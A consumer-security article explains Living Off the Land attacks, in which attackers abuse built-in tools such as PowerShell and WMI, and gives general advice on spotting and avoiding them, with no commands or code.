I write frequently about the threat of malware and how threat actors are using it to do everything from steal personal information to completely take over users’ devices or add them to botnets. These malware are spread through various forms of phishing, ClickFix attacks, malicious advertising, and even apps that have been vetted and approved by Apple and Google.
However, as users (and security tools) have become better at identifying the signs of malware infection and are savvy enough to avoid them in the first place, some cybercriminals have changed tactics: Living Off the Land (LOTL) attacks use built-in system utilities and tools that are less likely to raise red flags.
How Living Off the Land attacks work
like Huntress describesLOTL is about using local resources instead of importing new ones from outside. Instead of sneaking custom malware into a user’s machine, attackers use tools like PowerShell, Windows Management Instrumentation (WMI), built-in utilities, and trusted applications like Microsoft Teams for malicious purposes. Antivirus programs are unlikely to flag these tools as suspicious – in most cases they are not – because they mix with normal system processes and are it is assumed to be there.
By hijacking legitimate tools, threat actors can gain access to systems and networks, execute code remotely, escalate privileges, steal data, or even install other forms of malware. PowerShell’s command-line interface allows downloading files and executing commands, making it a popular tool for bad actors, along with WMI, although Unix binaries and signed Windows drivers are also commonly exploited.
LOTL raiders can use exploit kitswhich can distribute fileless malware through phishing or other forms of social engineering, as well as stolen credentials and fileless ransomware to gain access to proprietary tools. Malwarebytes Labs recently identified a campaign is distributed via fake Google Meet updates to exploit a legitimate Windows Device Enrollment feature – executed via an attack server hosted on a reputable mobile device management platform.
What do you think so far?
How to detect a LOTL attack
Many tactics to identify, address and prevent LOTL attacks are aimed at organizations with large defense infrastructures, but individual users can (and should) also be vigilant about this type of threat. As always, be on the lookout for signs of phishing and other forms of social engineering that bad actors use to steal credentials and gain access to networks and devices. Beware of unsolicited communications containing links, notifications about software and security updates, and anything that provokes curiosity, anxiety, urgency, or fear. Install security updates as soon as they are available to protect vulnerabilities from exploitation.
When it comes to detecting LOTL specifically, Huntress advises looking for unusual behavior, not just suspicious files or programs—for example, tools running outside their normal context or in unexpected patterns, as well as unusual network connections from system utilities. Monitor and log usage of commonly used tools and check all remote access tools and device recordings.
